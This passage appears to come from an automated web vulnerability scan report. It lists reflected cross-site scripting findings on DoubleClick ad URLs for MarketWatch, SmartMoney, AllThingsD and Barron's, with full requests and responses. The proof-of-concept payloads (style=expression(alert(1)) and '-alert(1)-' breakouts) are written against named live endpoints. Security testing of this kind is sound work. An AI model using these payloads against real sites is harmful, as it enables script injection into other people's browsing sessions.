Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 14 May 2011 10:31:55 GMT
Expires: Sat, 14 May 2011 10:31:55 GMT

<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body STYLE="background-color:transparent"><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects)
...[SNIP]...
ttp://ad.doubleclick.net/activity;src=1363789;stragg=1;v=1;pid=13314513;aid=240691320;ko=0;cid=41978572;rid=41996359;rv=1;rn=4201822;";
this.swfParams = 'src=1363789&rv=1&rid=41996359&=e76f1'-alert(1)-'733e9c42067&';
this.renderingId = "41996359";
this.previewMode = (("%PreviewMode" == "true") ? true : false);
this.debugEventsMode = (("%DebugEventsMode" == "true")
...[SNIP]...

4.27. http://ad.doubleclick.net/adi/marketwatch.com/mutualfunds_jaffe [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/marketwatch.com/mutualfunds_jaffe

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2282"style%3d"x%3aexpression(alert(1))"6fb2e5162b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b2282"style="x:expression(alert(1))"6fb2e5162b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/marketwatch.com/mutualfunds_jaffe;mc=MWRetWeek;s=8_10001;u=%5e%5elA;biz=1053;sz=377x100;tile=2;ord=1531063701?&b2282"style%3d"x%3aexpression(alert(1))"6fb2e5162b9=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13?link=MW_story_investinginsightb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:32:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 640

<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body STYLE="background-color:transparent"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/f;220450143;0-0;1;13314513;34555-377/100;34659507/34677385/1;u=^^lA;~okv=;mc=MWRetWeek;s=8_10001;u=^^lA;biz=1053;sz=377x100;tile=2;;b2282"style="x:expression(alert(1))"6fb2e5162b9=1;~aopt=2/1/ff/1;~sscs=%3fhttp://store.marketwatch.com/webapp/wcs/stores/servlet/PremiumNewsletters_RetirementWeekly?dist=IYMLMST1R">
...[SNIP]...

4.28. http://ad.doubleclick.net/adi/smartmoney.com/Homepage_Main_Front [!category parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/smartmoney.com/Homepage_Main_Front

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a590"style%3d"x%3aexpression(alert(1))"3f35620f0d0 was submitted in the !category parameter. This input was echoed as 3a590"style="x:expression(alert(1))"3f35620f0d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/smartmoney.com/Homepage_Main_Front;!category=;page=magsubscribe;;mc=0;tile=5;sz=378x115;ord=5424542454245424;3a590"style%3d"x%3aexpression(alert(1))"3f35620f0d0 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/?zone=intromessage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:19:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 573

<head><title>Click here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/a;241002750;0-0;0;62167023;41664-378/115;42067942/42085729/1;;~okv=;!category=;page=magsubscribe;;mc=0;tile=5;sz=378x115;3a590"style="x:expression(alert(1))"3f35620f0d0;~aopt=2/1/ff/1;~sscs=%3fhttps://w1.buysub.com/servlet/OrdersGateway?cds_mag_code=SMY&cds_page_id=66975&cds_response_key=IDLGODAB">
...[SNIP]...

4.29. http://ad.doubleclick.net/adi/smartmoney.com/Homepage_Main_Front [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/smartmoney.com/Homepage_Main_Front

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e208"style%3d"x%3aexpression(alert(1))"53d8c16d7c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9e208"style="x:expression(alert(1))"53d8c16d7c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/smartmoney.com/Homepage_Main_Front;!category=;page=magsubscribe;;mc=0;tile=5;sz=378x115;ord=5424542454245424;&9e208"style%3d"x%3aexpression(alert(1))"53d8c16d7c2=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/?zone=intromessage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:20:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 576

<head><title>Click here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/a;241002750;0-0;0;62167023;41664-378/115;42067942/42085729/1;;~okv=;!category=;page=magsubscribe;;mc=0;tile=5;sz=378x115;&9e208"style="x:expression(alert(1))"53d8c16d7c2=1;~aopt=2/1/ff/1;~sscs=%3fhttps://w1.buysub.com/servlet/OrdersGateway?cds_mag_code=SMY&cds_page_id=66975&cds_response_key=IDLGODAB">
...[SNIP]...

4.30. http://ad.doubleclick.net/adi/smartmoney.com/SmartMoney_Main_Front [!category parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/smartmoney.com/SmartMoney_Main_Front

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc80e"style%3d"x%3aexpression(alert(1))"6c0363045c7 was submitted in the !category parameter. This input was echoed as dc80e"style="x:expression(alert(1))"6c0363045c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/smartmoney.com/SmartMoney_Main_Front;!category=;page=smcirc;;mc=0;tile=4;sz=377x140;ord=2886288628862886;dc80e"style%3d"x%3aexpression(alert(1))"6c0363045c7 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/invest/strategies/heavy-metal-debate-silver-vs-gold-1305310258887/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:21:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 571

<head><title>Click here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/o;241002442;0-0;1;62559705;29332-377/140;42067982/42085769/1;;~okv=;!category=;page=smcirc;;mc=0;tile=4;sz=377x140;dc80e"style="x:expression(alert(1))"6c0363045c7;~aopt=2/1/ff/1;~sscs=%3fhttps://w1.buysub.com/servlet/OrdersGateway?cds_mag_code=SMY&cds_page_id=66975&cds_response_key=IDFGODAC">
...[SNIP]...

4.31. http://ad.doubleclick.net/adi/smartmoney.com/SmartMoney_Main_Front [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/smartmoney.com/SmartMoney_Main_Front

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6320"style%3d"x%3aexpression(alert(1))"6351d23f099 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c6320"style="x:expression(alert(1))"6351d23f099 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/smartmoney.com/SmartMoney_Main_Front;!category=;page=smcirc;;mc=0;tile=4;sz=377x140;ord=2886288628862886;&c6320"style%3d"x%3aexpression(alert(1))"6351d23f099=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/invest/strategies/heavy-metal-debate-silver-vs-gold-1305310258887/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:22:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 574

<head><title>Click here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/o;241002442;0-0;1;62559705;29332-377/140;42067982/42085769/1;;~okv=;!category=;page=smcirc;;mc=0;tile=4;sz=377x140;&c6320"style="x:expression(alert(1))"6351d23f099=1;~aopt=2/1/ff/1;~sscs=%3fhttps://w1.buysub.com/servlet/OrdersGateway?cds_mag_code=SMY&cds_page_id=66975&cds_response_key=IDFGODAC">
...[SNIP]...

4.32. http://ad.doubleclick.net/adi/smartmoney.com/SmartMoney_Main_Front [u parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/smartmoney.com/SmartMoney_Main_Front

Issue detail

The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fea9e"style%3d"x%3aexpression(alert(1))"aed0af3f5f was submitted in the u parameter. This input was echoed as fea9e"style="x:expression(alert(1))"aed0af3f5f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/smartmoney.com/SmartMoney_Main_Front;u=;!category=;page=magsubscribe;;mc=0;tile=1;sz=378x115;ord=5215521552155215;fea9e"style%3d"x%3aexpression(alert(1))"aed0af3f5f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/invest/strategies/heavy-metal-debate-silver-vs-gold-1305310258887/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:21:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 577

<head><title>Click here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/u;241002750;0-0;0;62559705;41664-378/115;42067942/42085729/1;u=;~okv=;u=;!category=;page=magsubscribe;;mc=0;tile=1;sz=378x115;fea9e"style="x:expression(alert(1))"aed0af3f5f;~aopt=2/1/ff/1;~sscs=%3fhttps://w1.buysub.com/servlet/OrdersGateway?cds_mag_code=SMY&cds_page_id=66975&cds_response_key=IDLGODAB">
...[SNIP]...

4.33. http://ad.doubleclick.net/adi/smartmoney.com/tool_module [!category parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/smartmoney.com/tool_module

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2516c"style%3d"x%3aexpression(alert(1))"69c275b066b was submitted in the !category parameter. This input was echoed as 2516c"style="x:expression(alert(1))"69c275b066b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/smartmoney.com/tool_module;!category=;page=commentSponsor;;mc=0;tile=2;sz=234x31;ord=2642264226422642;2516c"style%3d"x%3aexpression(alert(1))"69c275b066b HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/invest/strategies/heavy-metal-debate-silver-vs-gold-1305310258887/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:21:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 437

<head><title>Click here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/t;44306;0-0;0;62335141;1510-234/31;0/0/0;;~okv=;!category=;page=commentSponsor;;mc=0;tile=2;sz=234x31;2516c"style="x:expression(alert(1))"69c275b066b;~aopt=2/1/ff/1;~sscs=%3f">
...[SNIP]...

4.34. http://ad.doubleclick.net/adi/smartmoney.com/tool_module [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/smartmoney.com/tool_module

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1a1f"style%3d"x%3aexpression(alert(1))"8ab1cd5cae4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d1a1f"style="x:expression(alert(1))"8ab1cd5cae4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/smartmoney.com/tool_module;!category=;page=commentSponsor;;mc=0;tile=2;sz=234x31;ord=2642264226422642;&d1a1f"style%3d"x%3aexpression(alert(1))"8ab1cd5cae4=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/invest/strategies/heavy-metal-debate-silver-vs-gold-1305310258887/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:22:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 440

<head><title>Click here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/t;44306;0-0;0;62335141;1510-234/31;0/0/0;;~okv=;!category=;page=commentSponsor;;mc=0;tile=2;sz=234x31;&d1a1f"style="x:expression(alert(1))"8ab1cd5cae4=1;~aopt=2/1/ff/1;~sscs=%3f">
...[SNIP]...

4.35. http://ad.doubleclick.net/adj/allthingsd.com/general [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/allthingsd.com/general

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41629'-alert(1)-'cfc3eba9754 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/allthingsd.com/general;tile=1;sz=300x100;ord=5629598903469741?&41629'-alert(1)-'cfc3eba9754=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://allthingsd.com/about/kara-swisher/ethics/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 14 May 2011 10:34:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 443

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/m;211715823;0-0;0;16721520;3823-300/100;31527772/31545648/1;;~okv=;tile=1;sz=300x100;;41629'-alert(1)-'cfc3eba9754=1;~aopt=6/1/ff/1;~sscs=%3fhttp://itunes.apple.com/WebObjects/MZStore.woa/wa/viewSoftware?id=316429710&mt=8&s=143441">
...[SNIP]...

4.36. http://ad.doubleclick.net/adj/allthingsd.com/kara_singlepost [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/allthingsd.com/kara_singlepost

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4972'-alert(1)-'37c8b0d0a60 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/allthingsd.com/kara_singlepost;tile=1;sz=300x100;ord=7205884598661214?&a4972'-alert(1)-'37c8b0d0a60=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://kara.allthingsd.com/20110513/dear-yahoo-board-your-investors-are-on-line-2-and-theyre-not-happy/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 14 May 2011 10:23:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 443

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/u;211715823;0-0;0;16718698;3823-300/100;31527772/31545648/1;;~okv=;tile=1;sz=300x100;;a4972'-alert(1)-'37c8b0d0a60=1;~aopt=6/1/ff/1;~sscs=%3fhttp://itunes.apple.com/WebObjects/MZStore.woa/wa/viewSoftware?id=316429710&mt=8&s=143441">
...[SNIP]...

4.37. http://ad.doubleclick.net/adj/barrons.com/daily_barronstake [!category parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ad.doubleclick.net
Path:   /adj/barrons.com/daily_barronstake

Issue detail

The value of the !category request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28cf6'%3bf8b0d88d9d was submitted in the !category parameter. This input was echoed as 28cf6';f8b0d88d9d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/barrons.com/daily_barronstake;!category=;page=rightrail;msrc=BOL_other_tnav_analysis;biz=1053;;s=8_10001;mc=0;tile=9;sz=300x250,336x280,300x600,336x850;ord=2826282628262826;28cf6'%3bf8b0d88d9d HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.barrons.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/barrons.com/daily_barronstake;!category=;page=rightrail;msrc=BOL_other_tnav_analysis;biz=1053;;s=8_10001;mc=0;tile=9;sz=300x250,336x280,300x600,336x850;ord=2826282628262826;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 14 May 2011 10:34:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 573

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/u;236395304;0-0;0;62790958;10408-336/850;40689046/40706833/1;;~aopt=0/ff/ff/ff;~fdr=240892763;0-0;0;46249204;10408-336/850;42039043/42056830/1;;~okv=;!category=;page=rightrail;msrc=BOL_other_tnav_analysis;biz=1053;;s=8_10001;mc=0;tile=9;sz=300x250,336x280,300x600,336x850;28cf6';f8b0d88d9d;~aopt=2/1/ff/1;~sscs=%3fhttp://calamos.com/GrowthWorks">
...[SNIP]...

4.38. http://ad.doubleclick.net/adj/barrons.com/daily_barronstake [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/barrons.com/daily_barronstake

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6385e'%3balert(1)//d36868e77a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6385e';alert(1)//d36868e77a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/barrons.com/daily_barronstake;!category=;page=rightrail;msrc=BOL_other_tnav_analysis;biz=1053;;s=8_10001;mc=0;tile=9;sz=300x250,336x280,300x600,336x850;ord=2826282628262826;&6385e'%3balert(1)//d36868e77a4=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.barrons.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/barrons.com/daily_barronstake;!category=;page=rightrail;msrc=BOL_other_tnav_analysis;biz=1053;;s=8_10001;mc=0;tile=9;sz=300x250,336x280,300x600,336x850;ord=2826282628262826;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 14 May 2011 10:34:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 587

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/u;236395304;0-0;0;62790958;10408-336/850;40689046/40706833/1;;~aopt=0/ff/ff/ff;~fdr=240892763;0-0;0;46249204;10408-336/850;42039043/42056830/1;;~okv=;!category=;page=rightrail;msrc=BOL_other_tnav_analysis;biz=1053;;s=8_10001;mc=0;tile=9;sz=300x250,336x280,300x600,336x850;&6385e';alert(1)//d36868e77a4=1;~aopt=2/1/ff/1;~sscs=%3fhttp://calamos.com/GrowthWorks">
...[SNIP]...

4.39. http://ad.doubleclick.net/adj/barrons.com/survey [!category parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/barrons.com/survey

Issue detail

The value of the !category request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82c81'-alert(1)-'2dfd7f2477e was submitted in the !category parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/barrons.com/survey;!category=82c81'-alert(1)-'2dfd7f2477e HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/barrons.com/columnist;!category=;biz=1053;;s=8_10001;mc=0;tile=3;sz=300x250;ord=2817281728172817;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 416
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 14 May 2011 10:31:41 GMT
Expires: Sat, 14 May 2011 10:31:41 GMT

